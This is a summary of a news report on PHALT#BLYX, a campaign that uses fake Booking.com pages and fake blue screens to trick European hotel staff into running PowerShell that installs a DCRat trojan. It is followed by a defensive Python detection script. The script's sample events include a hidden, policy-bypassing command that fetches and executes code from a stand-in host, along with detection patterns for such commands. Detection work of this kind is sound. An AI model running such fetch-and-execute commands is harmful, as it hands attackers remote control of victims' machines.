Fake Windows BSODs check in at Europe’s hotels to con staff into running malware

Summary

Security researchers at Securonix have been tracking PHALT#BLYX, a social-engineering campaign that targets hotels and other hospitality organisations across Europe. Attackers send Booking.com-themed phishing emails about unexpected euro charges; the link leads to a believable Booking.com page that then displays a full-screen fake Windows Blue Screen of Death (BSOD).

The fake crash panics staff into following instructions that require them to paste and run a PowerShell command. Because the victim executes the command manually, the infection bypasses many automated defences. The payload is delivered via legitimate Windows tooling (now using MSBuild-based execution) and installs a remote-access trojan from the DCRat family, giving attackers persistent access to compromised machines.

Key Points

  • Campaign labelled PHALT#BLYX targets hospitality workers with Booking.com-style phishing about euro charges.
  • Attack uses a convincing fake full-screen Windows BSOD to induce panic and trick staff into running commands.
  • Manual execution by staff (ClickFix variant) lets the attack sidestep many automated security controls.
  • Adversaries moved to MSBuild-based execution and living-off-the-land techniques to evade antivirus detection.
  • The final payload is a remote access trojan (DCRat family) that enables spying and further malware delivery.
  • Artefacts in the attack chain show Russian-language indicators and tooling commonly traded on Russian underground forums.

Context and Relevance

This is important for anyone responsible for hospitality IT or front-of-house systems: reception and booking workstations are attractive targets because staff handle reservations, payments and guest data. The campaign exemplifies a wider trend of socially engineered attacks that combine panic-inducing lures with living-off-the-land techniques to bypass defences. Organisations should update staff training, restrict the ability to run unsigned scripts, and monitor for unusual MSBuild or PowerShell activity.
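As an added illustration of the monitoring advice above (this is example code written for this page, not tooling from Securonix or The Register), the script below applies two assumed heuristics to process-creation events of the kind Sysmon or an EDR records: a PowerShell process started from an interactive parent such as explorer.exe with window-hiding or encoded-command flags (the ClickFix "paste and run" pattern), and MSBuild started by something other than a normal build tool or pointed at a project file in a user-writable folder. The `ProcEvent` fields, the indicator lists and the sample events are all constructed for the example; the detail of the actual PHALT#BLYX command lines is not on this page.

```python
"""Added example: flag process-creation events that fit the ClickFix-to-MSBuild
pattern described in the summary. Heuristics and sample events are constructed
for illustration and are not taken from the Securonix report."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str   # image name (or path) of the parent process
    image: str    # image name (or path) of the created process
    cmdline: str  # full command line of the created process


# Parents a "paste this and press Enter" action (Win+R, cmd window) would use.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}

# Assumed ClickFix-style flags: hide the window, skip profile/policy, or pass an
# encoded command so the pasted text looks meaningless to the victim.
SUSPICIOUS_PS_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|enc(?:odedcommand)?\s|nop(?:rofile)?\b"
    r"|ep\s+bypass|executionpolicy\s+bypass)",
    re.IGNORECASE,
)

# Cmdlets/methods that pull a second stage from the network (assumed list).
REMOTE_FETCH = re.compile(
    r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b",
    re.IGNORECASE,
)

# Parents from which MSBuild normally runs on a developer machine (assumed).
LEGIT_BUILD_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe"}

# User-writable locations where a real build project rarely lives (assumed).
USER_WRITABLE_PATH = re.compile(
    r"\\(?:temp|appdata|public|users\\[^\\]+\\downloads)\\", re.IGNORECASE
)


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows path or bare name."""
    return path.lower().rsplit("\\", 1)[-1]


def classify(ev: ProcEvent) -> list[str]:
    """Return the list of reasons an event looks suspicious (empty if benign)."""
    reasons: list[str] = []
    image, parent = basename(ev.image), basename(ev.parent)

    if image in {"powershell.exe", "pwsh.exe"}:
        if parent in INTERACTIVE_PARENTS and SUSPICIOUS_PS_FLAGS.search(ev.cmdline):
            reasons.append("powershell launched interactively with hidden/encoded flags")
        if REMOTE_FETCH.search(ev.cmdline):
            reasons.append("powershell command fetches remote content")

    if image == "msbuild.exe":
        if parent not in LEGIT_BUILD_PARENTS:
            reasons.append(f"msbuild spawned by {parent}")
        if USER_WRITABLE_PATH.search(ev.cmdline):
            reasons.append("msbuild project file in a user-writable location")

    return reasons


def scan(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Return (event, reasons) pairs for every event that triggers a heuristic."""
    return [(ev, r) for ev in events if (r := classify(ev))]


# Constructed sample events (not real telemetry); example.invalid is a reserved name.
SAMPLE_EVENTS = [
    ProcEvent("devenv.exe", "MSBuild.exe",
              r"MSBuild.exe C:\src\app\app.csproj /t:Build"),            # benign build
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell.exe -w hidden -ep bypass -c "irm https://example.invalid/a | iex"'),
    ProcEvent("powershell.exe", "MSBuild.exe",
              r"MSBuild.exe C:\Users\Public\proj.xml"),                  # LOLBin stage
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe"),       # benign console
]

if __name__ == "__main__":
    for ev, reasons in scan(SAMPLE_EVENTS):
        print(f"{ev.parent} -> {ev.image}: {'; '.join(reasons)}")
```

The heuristics are deliberately narrow so they can be tuned per site: on reception and booking workstations that never build software, any `msbuild.exe` launch is worth an alert, whereas on a developer machine only the parent and project-path checks carry signal.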

Why should I read this?

Short and blunt: because your receptionist might be tricked into launching a RAT by what looks like a Booking.com error. It’s a neat, panic-first trick that lets attackers piggyback on everyday Windows tools — so if you care about guest data, bookings or payments, this is exactly the type of attack you want to know about now.

Author style

Punchy: this is the kind of social-hack that works because it scares people into acting. Read the detail — the technique is evolving, it bypasses standard controls, and the consequences for hospitality operations can be immediate.

Source

https://go.theregister.com/feed/www.theregister.com/2026/01/06/russia_hackers_hotel_bsods/